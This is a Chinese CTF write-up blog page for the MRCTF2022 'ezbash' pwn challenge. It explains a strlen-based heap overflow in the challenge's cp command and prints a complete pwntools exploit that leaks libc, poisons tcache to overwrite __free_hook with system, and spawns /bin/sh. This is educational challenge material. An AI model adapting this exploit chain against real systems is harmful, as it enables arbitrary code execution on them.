<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  
  <title>MRCTF2022_pwn方向部分wrieup | Rabbit hole | We don&#39;t choose who we are, but we do choose who we become.</title>

  
  <meta name="author" content="MEssa_Rabbit">
  

  
  <meta name="description" content="菜狗一个">
  

  
  
  <meta name="keywords" content="pwn,CTF,writeup">
  

  <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">

  <meta property="og:title" content="MRCTF2022_pwn方向部分wrieup"/>

  <meta property="og:site_name" content="Rabbit hole"/>

  
  <meta property="og:image" content="/favicon.ico"/>
  

  <link href="/favicon.ico" rel="icon">
  <link rel="alternate" href="/atom.xml" title="Rabbit hole" type="application/atom+xml">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
<div class="blog">
  <div class="content">

    <header>
  <div class="site-branding">
    <h1 class="site-title">
      <a href="/">Rabbit hole</a>
    </h1>
    <p class="site-description">We don&#39;t choose who we are, but we do choose who we become.</p>
  </div>
  <nav class="site-navigation">
    <ul>
      
    </ul>
  </nav>
</header>

    <main class="site-main posts-loop">
    <article>

  
    
    <h3 class="article-title"><span>MRCTF2022_pwn方向部分wrieup</span></h3>
    
  

  <div class="article-top-meta">
    <span class="posted-on">
      <a href="/2022/04/28/MRCTF2022-pwn方向复现/" rel="bookmark">
        <time class="entry-date published" datetime="2022-04-28T06:26:36.000Z">
          2022-04-28
        </time>
      </a>
    </span>
  </div>


  

  <div class="article-content">
    <div class="entry">
      
        <!-- 由于本人太菜了，只有部分复现成功了。 -->

<span id="more"></span>

<h2 id="ezbash"><a href="#ezbash" class="headerlink" title="ezbash"></a>ezbash</h2><h3 id="程序分析"><a href="#程序分析" class="headerlink" title="程序分析"></a>程序分析</h3><p>一个简易的 bash，用户每创建一个文件夹或文件就会申请一个 0x50 大小的 chunk。</p>
<p>官方给出对应的结构体如下</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">typedef</span> <span class="class"><span class="keyword">enum</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">    DIR,</span><br><span class="line">    FIL,</span><br><span class="line">&#125; TYPE;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">Node</span></span></span><br><span class="line"><span class="class">&#123;</span></span><br><span class="line">    TYPE type;</span><br><span class="line">    <span class="keyword">char</span> Name[<span class="number">0x10</span>];</span><br><span class="line">    <span class="keyword">char</span> *content;</span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">Node</span> *<span class="title">pre</span>;</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">Node</span> *<span class="title">next</span>;</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">Node</span> *<span class="title">parent</span>;</span></span><br><span class="line">    <span class="class"><span class="keyword">struct</span> <span class="title">Node</span> *<span class="title">head</span>;</span></span><br><span class="line">&#125;;</span><br></pre></td></tr></table></figure>

<p>用户的输入点只有输入指令的那部分，输入的指令会预先被放入一个 chunk 中，其大小为 0x150 的倍数。</p>
<p>程序中向文件写入内容是通过 echo 配合重定向功能实现或者使用 cp 来将内容复制给其他文件，并且出题人将重定向符号改成了<code>-&gt;</code>，由于本人太菜了，并没有看出来。直接使用 echo 功能来写入时，申请的 chunk 大小也是 0x150 的倍数，而使用 cp 复制时，其申请大小就为 source 文件内容的长度。</p>
<h3 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>漏洞分析</h3><p>根据官方 writeup 所述，找到了 cp 功能中执行内容覆盖的那部分，其中有漏洞部分为：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">……</span><br><span class="line">  <span class="keyword">if</span> ( (<span class="keyword">const</span> <span class="keyword">char</span> **)a1 != a2 &amp;&amp; (*(_QWORD *)(a1 + <span class="number">24</span>) || (result = (<span class="keyword">char</span> *)a2[<span class="number">3</span>]) != <span class="number">0LL</span>) )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="keyword">if</span> ( *(_QWORD *)(a1 + <span class="number">24</span>) || !a2[<span class="number">3</span>] )</span><br><span class="line">    &#123;</span><br><span class="line">      <span class="keyword">if</span> ( *(_QWORD *)(a1 + <span class="number">24</span>) &amp;&amp; a2[<span class="number">3</span>] )</span><br><span class="line">      &#123;</span><br><span class="line">        v4 = <span class="built_in">strlen</span>(*(<span class="keyword">const</span> <span class="keyword">char</span> **)(a1 + <span class="number">24</span>));</span><br><span class="line">        v5 = <span class="built_in">strlen</span>(a2[<span class="number">3</span>]);</span><br><span class="line">        <span class="keyword">if</span> ( v4 &gt; v5 )</span><br><span class="line">        &#123;</span><br><span class="line">          v3 = (<span class="keyword">void</span> **)<span class="built_in">realloc</span>((<span class="keyword">void</span> *)a2[<span class="number">3</span>], v4 + <span class="number">1</span>);</span><br><span class="line">          <span class="built_in">memset</span>(v3[<span class="number">3</span>], <span class="number">0</span>, v4 + <span class="number">1</span>);</span><br><span class="line">        &#125;</span><br><span class="line">……</span><br></pre></td></tr></table></figure>

<p>其中使用 strlen 来获得两个字符串的长度，因此当我们被覆盖字符串与next_chunk的size位相邻时，strlen 得到的长度会比原本的长，产生了溢出漏洞。</p>
<h3 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h3><p>利用 cp 中的溢出漏洞，修改下一块地址的大小，并且由于 glibc 版本为2.31，因此需要的修改大小为非 tcache_chunk_size，释放后再作为文件内容申请，且不改变其中内容，从而泄露libc地址。</p>
<p>然后再通过申请一个较大的 chunk 覆盖几个文件结构体，修改其中指针来将 free_hook 地址放入 tcache 中，再通过申请得到。</p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context(os=<span class="string">&#x27;linux&#x27;</span>,arch=<span class="string">&#x27;amd64&#x27;</span>,terminal=[<span class="string">&#x27;tmux&#x27;</span>,<span class="string">&#x27;splitw&#x27;</span>,<span class="string">&#x27;-h&#x27;</span>])</span><br><span class="line"></span><br><span class="line">io=process(<span class="string">&#x27;./ezbash&#x27;</span>)</span><br><span class="line"><span class="comment"># io=remote(path)</span></span><br><span class="line"></span><br><span class="line">elf=ELF(<span class="string">&#x27;./ezbash&#x27;</span>)</span><br><span class="line"></span><br><span class="line">libc_file=<span class="string">&#x27;./libc.so.6&#x27;</span></span><br><span class="line"></span><br><span class="line">cmd=<span class="keyword">lambda</span> x:io.sendlineafter(<span class="string">&#x27;:&#x27;</span>,x)</span><br><span class="line"></span><br><span class="line">cmd(<span class="string">&#x27;touch A&#x27;</span>)</span><br><span class="line">cmd(<span class="string">&#x27;touch B&#x27;</span>)</span><br><span class="line">cmd(<span class="string">&#x27;touch C&#x27;</span>)</span><br><span class="line"></span><br><span class="line">cmd(<span class="string">&#x27;echo &#x27;</span>+<span class="string">&#x27;a&#x27;</span>*<span class="number">0xf8</span>+<span class="string">&#x27; -&gt; A&#x27;</span>)</span><br><span class="line">cmd(<span class="string">&#x27;cp A B&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;echo &#x27;</span></span><br><span class="line">payload+=<span class="string">&#x27;b&#x27;</span>*<span class="number">0xf8</span></span><br><span class="line">payload+=p16(<span class="number">0x431</span>)</span><br><span class="line">payload+=<span class="string">&#x27; -&gt; C&#x27;</span></span><br><span class="line">cmd(payload)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">10</span>):</span><br><span class="line">    cmd(<span class="string">&#x27;touch &#x27;</span>+<span class="built_in">str</span>(i))</span><br><span class="line"></span><br><span class="line">cmd(<span class="string">&#x27;cp C B&#x27;</span>)</span><br><span class="line"></span><br><span class="line">cmd(<span class="string">&#x27;rm C&#x27;</span>)</span><br><span class="line"></span><br><span class="line">cmd(<span class="string">&#x27;echo -&gt; B&#x27;</span>)</span><br><span class="line">cmd(<span class="string">&#x27;cp B 0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">cmd(<span class="string">&#x27;cat 0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">main_arena=u64(io.recvuntil(<span class="string">&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">&#x27;\0&#x27;</span>))-<span class="number">1104</span></span><br><span class="line">libc_base=main_arena-<span class="number">0x1ecb80</span></span><br><span class="line">libc=elf.libc</span><br><span class="line"></span><br><span class="line">free_hook=libc_base+libc.sym[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">system=libc_base+libc.sym[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line"></span><br><span class="line">cmd(<span class="string">&#x27;rm 0&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">0x130</span></span><br><span class="line">payload+=p64(<span class="number">0</span>)+p64(<span class="number">0x50</span>)</span><br><span class="line">payload+=p64(free_hook-<span class="number">4</span>)</span><br><span class="line">payload+=p64(<span class="number">0</span>)*<span class="number">8</span></span><br><span class="line">payload+=p64(<span class="number">0x51</span>)</span><br><span class="line">payload+=p64(<span class="number">0</span>)*<span class="number">6</span>         <span class="comment"># 将 pre next 指针清空，防止遍历节点时 crash</span></span><br><span class="line">cmd(payload)</span><br><span class="line"></span><br><span class="line">cmd(<span class="string">&#x27;touch getshell&#x27;</span>)</span><br><span class="line">cmd(<span class="string">&#x27;echo /bin/sh -&gt; getshell&#x27;</span>)</span><br><span class="line"></span><br><span class="line">cmd(<span class="string">&#x27;touch &#x27;</span>+p64(system))</span><br><span class="line"></span><br><span class="line">cmd(<span class="string">&#x27;rm getshell&#x27;</span>)</span><br><span class="line"></span><br><span class="line"><span class="comment"># gdb.attach(io)</span></span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

      
    </div>

  </div>

  <div class="article-footer">
    <div class="article-meta pull-left">

    

    
    

    <span class="post-tags">
      <i class="icon-tags"></i>
        <a href="/tags/pwn/">pwn</a><a href="/tags/CTF/">CTF</a><a href="/tags/writeup/">writeup</a>
    </span>
    

    </div>

    
  </div>
</article>

  









    </main>

    <footer class="site-footer">
  <p class="site-info">
    Proudly powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and
    Theme by <a href="https://github.com/CodeDaraW/Hacker" target="_blank">Hacker</a>
    </br>
    
    &copy; 2023 MEssa_Rabbit
    
  </p>
</footer>
    
    
  </div>
</div>
</body>
</html>